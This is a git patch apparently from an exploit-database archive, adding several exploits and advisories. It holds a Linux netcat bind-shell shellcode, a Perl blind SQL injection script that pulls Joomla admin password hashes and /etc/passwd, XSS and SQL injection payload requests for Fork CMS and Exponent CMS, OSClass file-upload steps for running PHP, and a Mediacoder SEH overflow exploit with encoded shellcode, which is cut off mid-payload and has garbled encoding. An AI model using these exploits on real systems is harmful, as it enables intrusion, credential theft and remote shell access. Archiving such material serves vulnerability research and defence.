From b2d25f8fa5056e1304fcc2f75dcdc6f05416975d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 7 May 2015 05:03:16 +0000 Subject: [PATCH] DB: 2015-05-07 9 new exploits --- files.csv | 11 +- platforms/hardware/remote/4522.html | 62 +++---- platforms/ios/dos/36903.txt | 162 +++++++++++++++++ platforms/ios/webapps/36922.txt | 263 ++++++++++++++++++++++++++++ platforms/lin_x86/shellcode/36921.c | 51 ++++++ platforms/php/webapps/36913.pl | 125 +++++++++++++ platforms/php/webapps/36914.txt | 61 +++++++ platforms/php/webapps/36916.txt | 9 + platforms/php/webapps/36917.txt | 43 +++++ platforms/windows/local/36920.py | 50 ++++++ platforms/windows/remote/36803.py | 47 ----- platforms/windows/remote/36915.txt | 10 ++ 12 files changed, 815 insertions(+), 79 deletions(-) create mode 100755 platforms/ios/dos/36903.txt create mode 100755 platforms/ios/webapps/36922.txt create mode 100755 platforms/lin_x86/shellcode/36921.c create mode 100755 platforms/php/webapps/36913.pl create mode 100755 platforms/php/webapps/36914.txt create mode 100755 platforms/php/webapps/36916.txt create mode 100755 platforms/php/webapps/36917.txt create mode 100755 platforms/windows/local/36920.py delete mode 100755 platforms/windows/remote/36803.py create mode 100755 platforms/windows/remote/36915.txt diff --git a/files.csv b/files.csv index d41f01845..3c0e7842e 100755 --- a/files.csv +++ b/files.csv @@ -4164,6 +4164,7 @@ id,file,description,date,author,platform,type,port 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0 4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0 +4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 @@ -33207,7 +33208,7 @@ id,file,description,date,author,platform,type,port 36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0 36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0 36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0 -36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0 +36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0 @@ -33293,12 +33294,20 @@ id,file,description,date,author,platform,type,port 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 +36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0 +36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 'src' Parameter SQL Injection Vulnerability",2012-03-07,"Rob Miller",php,webapps,0 +36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0 36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0 36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x 'select_users_template' Parameter Local File Include Vulnerability",2012-03-05,"Aung Khant",php,webapps,0 36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 +36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' SQL Injection Vulnerability",2012-03-05,"Colin Wong",php,webapps,0 36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0 36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0 +36920,platforms/windows/local/36920.py,"Mediacoder 0.8.34.5716 - Buffer Overflow SEH Exploit (.m3u)",2015-05-06,evil_comrade,windows,local,0 +36921,platforms/lin_x86/shellcode/36921.c,"Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 Bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 +36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0 36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 diff --git a/platforms/hardware/remote/4522.html b/platforms/hardware/remote/4522.html index cc5531449..d852690ef 100755 --- a/platforms/hardware/remote/4522.html +++ b/platforms/hardware/remote/4522.html @@ -1,31 +1,31 @@ - - - - - - -# milw0rm.com [2007-10-11] + + + + + + +# milw0rm.com [2007-10-11] diff --git a/platforms/ios/dos/36903.txt b/platforms/ios/dos/36903.txt new file mode 100755 index 000000000..ced6b8bd4 --- /dev/null +++ b/platforms/ios/dos/36903.txt @@ -0,0 +1,162 @@ +Document Title: +=============== +Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1418 + + +Release Date: +============= +2015-05-02 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1418 + + +Common Vulnerability Scoring System: +==================================== +3.3 + + +Product & Service Introduction: +=============================== +Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there. +With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app +every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s +location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is +entirely your call. + +(Copy of the Vendor Homepage: http://grindr.com/learn-more ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security) +2015-01-22: Vendor Notification (Grinder - Bug Bounty Program) +2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program) +2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x) +2015-05-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Grindr LLC +Product: Grinder - iOS Mobile Web Application (API) 2.2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application. + +The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module. +After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the +contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app. +The issue is local and remote exploitable. + +Vulnerable Module(s): +[+] Edit Profile + +Vulnerable Parameter(s): (Input) +[+] Display Name + +Affected Module(s): +[+] Contact > Social Network > Copy Link + + + +Proof of Concept (PoC): +======================= +The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click). +To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue. + +Manual steps to reproduce ... +1. Open the grindr mobile application +2. Inject a script code tag as Display Name or use the terminated String with empty values +3. Save and click in the profile the contact button (exp. facebook) +4. Click to the send button ahead and push the Copy Link function +5. The app service is getting terminated with an uncaught exception because of an internal parsing error + +Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button. + +PoC Video: + + +Solution - Fix & Patch: +======================= +First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself. +The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register +an account and to insert own scripts or null strings that corrupts the process of copy the link by an error. After the restriction has been +set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that +was only a solution to prevent. + +To fix the bug ... +Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error +folder that has been synced. Get the error attach another debugger and so on ... + + +Security Risk: +============== +The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/ios/webapps/36922.txt b/platforms/ios/webapps/36922.txt new file mode 100755 index 000000000..ba21d6a21 --- /dev/null +++ b/platforms/ios/webapps/36922.txt @@ -0,0 +1,263 @@ +Document Title: +=============== +vPhoto-Album v4.2 iOS - File Include Web Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1477 + + +Release Date: +============= +2015-05-05 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1477 + + +Common Vulnerability Scoring System: +==================================== +6.2 + + +Product & Service Introduction: +=============================== +vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos, +while giving you an unprecedented user experience. No in-app purchase, no functional limitations. + +(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-05: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Cheng Chen +Product: vPhoto-Album - iOS Web Application (Wifi) 4.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system +specific path commands to compromise the mobile web-application. + +The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the +wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname. + +Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync. +The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application. +The request method to inject is a sync and the attack vector is located on the application-side of the affected service. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1. +Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation +of the local file include web vulnerability results in mobile application or connected device component compromise. + +Vulnerable Method(s): + [+] [Sync] + +Vulnerable Module(s): + [+] Albumname + +Vulnerable Parameter(s): + [+] name + +Affected Module(s): + [+] File Dir Index + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + + +PoC: http://localhost:8080/ + + +

">(2)

Camera Roll(2)

+ + + +

+ + +Reference(s): +http://localhost:8080/ + + +Security Risk: +============== +The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + + diff --git a/platforms/lin_x86/shellcode/36921.c b/platforms/lin_x86/shellcode/36921.c new file mode 100755 index 000000000..ab97a118b --- /dev/null +++ b/platforms/lin_x86/shellcode/36921.c @@ -0,0 +1,51 @@ +/* +# Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode +# This shellcode will listen on port 17771 and give you /bin/sh +# Shellcode Author: Oleg Boytsev +# Tested on: Debian GNU/Linux 7/i686 +# Shellcode Length: 58 +# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode + +global _start +section .text + _start: + xor eax, eax + xor edx, edx + push eax + push 0x31373737 ;-vp17771 + push 0x3170762d + mov esi, esp + + push eax + push 0x68732f2f ;-le//bin//sh + push 0x6e69622f + push 0x2f656c2d + mov edi, esp + + push eax + push 0x636e2f2f ;/bin//nc + push 0x6e69622f + mov ebx, esp + + push edx + push esi + push edi + push ebx + mov ecx, esp + mov al,11 + int 0x80 +*/ + +#include +#include + +unsigned char shellcode[] = +"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n",strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} + diff --git a/platforms/php/webapps/36913.pl b/platforms/php/webapps/36913.pl new file mode 100755 index 000000000..fbf82dc47 --- /dev/null +++ b/platforms/php/webapps/36913.pl @@ -0,0 +1,125 @@ +source: http://www.securityfocus.com/bid/52312/info + +Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +#!/usr/bin/perl +# Thu Mar 15 22:55:32 CET 2012 A. Ramos +# www.securitybydefault.com +# Joomla <2.5.1 time based sql injection - vuln by Colin Wong +# +# using sleep() and not benchmark(), change for < mysql 5.0.12 +# +# 1.- Database name: database() +# 2.- Users data table name: (change 'joomla' for database() result) +# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users" +# 3.- Admin password: (change zzz_users from previus sql query result) +# select password from zzzz_users limit 1 + + + +use strict; +use LWP::UserAgent; +$| = 1; + + +my $url = $ARGV[0]; +my $wtime = $ARGV[1]; +my $sql = $ARGV[2]; + +unless ($ARGV[2]) { + print "$0 \n"; + print "\texamples:\n"; + print "\t get admin password:\n"; + print "\t\t$0 http://host/joomla/ 3 'database()'\n"; + print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n"; + print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n"; + print "\t get file /etc/passwd\n"; + print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n"; + exit 1; +} + +my ($len,$sqldata); + +my $ua = LWP::UserAgent->new; +$ua->timeout(60); +$ua->env_proxy; + +my $stime = time(); +my $res = $ua->get($url); +my $etime = time(); +my $regrtt = $etime - $stime; +print "rtt: $regrtt secs\n"; +print "vuln?: "; + +my $sleep = $regrtt + $wtime; +$stime = time(); +$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1"); +$etime = time(); +my $rtt = $etime - $stime; +if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; } + + +my $lenoflen; +sub len { + # length of length + for (1..5) { + my $sql=$_[0]; + $stime = time(); + $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1"); + $etime = time(); + my $rtt = $etime - $stime; + if ($rtt >= $regrtt + $wtime) { + $lenoflen = $_; + last; + } + } + for (1..$lenoflen) { + my $ll; + $ll=$_; + for (0..9) { + my $sql=$_[0]; + $stime = time(); + $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1"); + $etime = time(); + my $rtt = $etime - $stime; + if ($rtt >= $regrtt + $wtime) { + $len .= $_; + } + } + } + return $len; + +} + +sub data { + my $sql = $_[0]; + my $len = $_[1]; + my ($bit, $str, @byte); + my $high = 128; + + for (1..$len) { + my $c=8; + @byte=""; + my $a=$_; + for ($bit=1;$bit<=$high;$bit*=2) { + $stime = time(); + # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1'; + $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1"); + $etime = time(); + my $rtt = $etime - $stime; + if ($rtt >= $regrtt + $wtime) { + $byte[$c]="0"; + } else { $byte[$c]="1"; } + $c--; + } + $str = join("",@byte); + print pack("B*","$str"); + } +} + +$len = len($sql); +print "$sql length: $len\n"; +print "$sql data:\n\n"; +data($sql,$len); \ No newline at end of file diff --git a/platforms/php/webapps/36914.txt b/platforms/php/webapps/36914.txt new file mode 100755 index 000000000..b06b45bc5 --- /dev/null +++ b/platforms/php/webapps/36914.txt @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/52319/info + +Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. + +Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected. + +http://www.example.com/private/en/locale/edit?id=37&value="> + +http://www.example.com/private/en/locale/edit?id=37&name="> + +http://www.example.com/private/en/locale/edit?id=37&type[]="> + +http://www.example.com/private/en/locale/edit?id=37&module="> + +http://www.example.com/private/en/locale/edit?id=37&application="> + +http://www.example.com/private/en/locale/edit?id=37&language[]="> + +Parameter: form_token +Method: POST + + - POST /private/en/authentication/?querystring=/private/en HTTP/1.1 + Content-Length: 134 + Content-Type: application/x-www-form-urlencoded + Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B + Host: localhost:80 + Connection: Keep-alive + Accept-Encoding: gzip,deflate + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) + + backend_email=&backend_password=&form=authenticationIndex&form_token=">&login=Log%20in + +Parameters: position_1, position_2, position_3, position_4 +Method: POST + + - POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1 + + form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1=">&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D + +Parameter: success_message +Method: POST + + - POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1 + + form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message=">&identifier=contact-en + +Parameter: smtp_password +Method: POST + + - POST http://localhost/private/en/settings/email HTTP/1.1 + + form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="> + +Parameters: site_html_footer, site_html_header +Method: POST + + - POST http://localhost/private/en/settings/index HTTP/1.1 + + form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer=">&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret= \ No newline at end of file diff --git a/platforms/php/webapps/36916.txt b/platforms/php/webapps/36916.txt new file mode 100755 index 000000000..49c95f814 --- /dev/null +++ b/platforms/php/webapps/36916.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52328/info + +Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected. + +http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20" \ No newline at end of file diff --git a/platforms/php/webapps/36917.txt b/platforms/php/webapps/36917.txt new file mode 100755 index 000000000..e9b79776f --- /dev/null +++ b/platforms/php/webapps/36917.txt @@ -0,0 +1,43 @@ +source: http://www.securityfocus.com/bid/52336/info + +OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. + +An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process. + +OSClass 2.3.5 is vulnerable; prior versions may also be affected. + +Arbitrary File Upload Vulnerability: + +1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type) + +2. Upload that file as picture for a new item and get its name (is 5_small.jpg) + +3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php) + +4. Use combine.php to move itself to oc-content/uploads +http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php +now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded) + +5. Use uploads/combine.php to move 5_original.php to /remote.php +http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php + + +6. Run the uploaded php file +http://www.example.com/osclass/remote.php + + + + +Directory Traversal Vulnerability: + +It is possible to download and arbitrary file (ie config.php) under the www root. + +1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding) + +2. Move combine.php into web root +http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php + +3. Run combine to download config.php +http://www.example.com/osclass/combine.php?files=config.php + + diff --git a/platforms/windows/local/36920.py b/platforms/windows/local/36920.py new file mode 100755 index 000000000..6163f8b2c --- /dev/null +++ b/platforms/windows/local/36920.py @@ -0,0 +1,50 @@ +#!/usr/bin/python +# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u) +# Date: 05/May/2015 +# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan +# email: kwiha2003 [at ]yahoo [dot] com=20 +# Version: 0.8.34.5716 +# Tested on: Win XP3 +# Vendor: http://www.mediacoderhq.com/ +# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.= +info&file=3DMediaCoder-0.8.34.5716.exe + +# Greetz: b33f,corelan,offsec,vulnhub,HUST510 +# Notes: Due to insifficient space after taking control of the EIP, you hav= +e to jump backwards and also=20 +# avoid a few bad bytes after the "A"s. + +#!/usr/bin/python +buffersize =3D 853 +buffer =3D ("http://" + "\x41" * 256) +#Space for shellcode to decode +buffer +=3D "\x90" * 24 +# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c= + -e x86/shikata_ga_nai +#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1) +#unsigned char buf[] =3D=20 +buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1" +"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69" 